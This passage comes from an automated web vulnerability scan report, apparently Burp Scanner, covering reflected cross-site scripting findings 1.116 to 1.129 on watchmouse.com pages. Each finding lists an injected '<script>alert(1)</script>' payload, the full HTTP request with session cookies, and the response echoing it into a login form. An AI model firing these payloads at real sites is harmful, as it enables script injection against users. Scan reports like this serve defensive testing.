Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9f6c6655762e1bc43a3cc757d2cb5ebc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en487ba"><script>alert(1)</script>c0c36788f3f/feature/api-and-web-services-cloud-monitoring.html" method="post">
...[SNIP]...

1.116. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b192a"><script>alert(1)</script>4a903a5d4a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/featureb192a"><script>alert(1)</script>4a903a5d4a5/api-and-web-services-cloud-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ef2f8e97c1e40f40296fb0d823c06963"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/featureb192a"><script>alert(1)</script>4a903a5d4a5/api-and-web-services-cloud-monitoring.html" method="post">
...[SNIP]...

1.117. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beb54"><script>alert(1)</script>dc0b88f9433 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/api-and-web-services-cloud-monitoring.htmlbeb54"><script>alert(1)</script>dc0b88f9433 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a9a2c997936dc8d0af26bb34bfef74cf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.htmlbeb54"><script>alert(1)</script>dc0b88f9433" method="post">
...[SNIP]...

1.118. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d7f"><script>alert(1)</script>8f27bbd4825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/api-and-web-services-cloud-monitoring.html?60d7f"><script>alert(1)</script>8f27bbd4825=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8fa90c08501ebf73e13a862b1dde7698"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/api-and-web-services-cloud-monitoring.html?60d7f"><script>alert(1)</script>8f27bbd4825=1" method="post">
...[SNIP]...

1.119. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf13"><script>alert(1)</script>6fdd1dec09c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en4cf13"><script>alert(1)</script>6fdd1dec09c/feature/compare_plans.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5ed100168235b692a4ca25b8e4e68aaf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en4cf13"><script>alert(1)</script>6fdd1dec09c/feature/compare_plans.php" method="post">
...[SNIP]...

1.120. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b69d"><script>alert(1)</script>c3996150547 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature5b69d"><script>alert(1)</script>c3996150547/compare_plans.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-7917c81f8aaa01fa1264e9649b126e96"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature5b69d"><script>alert(1)</script>c3996150547/compare_plans.php" method="post">
...[SNIP]...

1.121. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1671f"><script>alert(1)</script>203b8264d7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/compare_plans.php1671f"><script>alert(1)</script>203b8264d7f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b58daf6d0d5b2cb3e25431f51eadbe16"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/compare_plans.php1671f"><script>alert(1)</script>203b8264d7f" method="post">
...[SNIP]...

1.122. http://www.watchmouse.com/en/feature/compare_plans.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99b2"><script>alert(1)</script>6d22ff4967f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/compare_plans.php?a99b2"><script>alert(1)</script>6d22ff4967f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-aa546511901888e7a70cd079e87020ff"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/compare_plans.php?a99b2"><script>alert(1)</script>6d22ff4967f=1" method="post">
...[SNIP]...

1.123. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1db0"><script>alert(1)</script>5dd715f3a03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb1db0"><script>alert(1)</script>5dd715f3a03/feature/ipv6-performance-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a212367c275ffe8c0f1486af2d8ff4bc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb1db0"><script>alert(1)</script>5dd715f3a03/feature/ipv6-performance-monitoring.html" method="post">
...[SNIP]...

1.124. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca04"><script>alert(1)</script>f8153d05f72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/featureeca04"><script>alert(1)</script>f8153d05f72/ipv6-performance-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9c6109f5abbb15d18c62424830112bf9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/featureeca04"><script>alert(1)</script>f8153d05f72/ipv6-performance-monitoring.html" method="post">
...[SNIP]...

1.125. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16cf"><script>alert(1)</script>49a14e52a8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/ipv6-performance-monitoring.htmle16cf"><script>alert(1)</script>49a14e52a8f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-6608d9a325f0a7f20bd56bf22af97cfd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/ipv6-performance-monitoring.htmle16cf"><script>alert(1)</script>49a14e52a8f" method="post">
...[SNIP]...

1.126. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aca1"><script>alert(1)</script>4484029025a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/ipv6-performance-monitoring.html?8aca1"><script>alert(1)</script>4484029025a=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ce3bb42c6db13291bc353b062ff169e7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/ipv6-performance-monitoring.html?8aca1"><script>alert(1)</script>4484029025a=1" method="post">
...[SNIP]...

1.127. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4432"><script>alert(1)</script>55c0466f113 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb4432"><script>alert(1)</script>55c0466f113/feature/privacy.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0f4f320dd8ee4d0ddaba9ea9cd75837f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb4432"><script>alert(1)</script>55c0466f113/feature/privacy.php" method="post">
...[SNIP]...

1.128. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda58"><script>alert(1)</script>9731a381c2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/featurecda58"><script>alert(1)</script>9731a381c2e/privacy.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bc4df4e5654c8a855186798ea477c728"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/featurecda58"><script>alert(1)</script>9731a381c2e/privacy.php" method="post">
...[SNIP]...

1.129. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3859"><script>alert(1)</script>e5e0918e440 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/privacy.phpf3859"><script>alert(1)</script>e5e0918e440 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
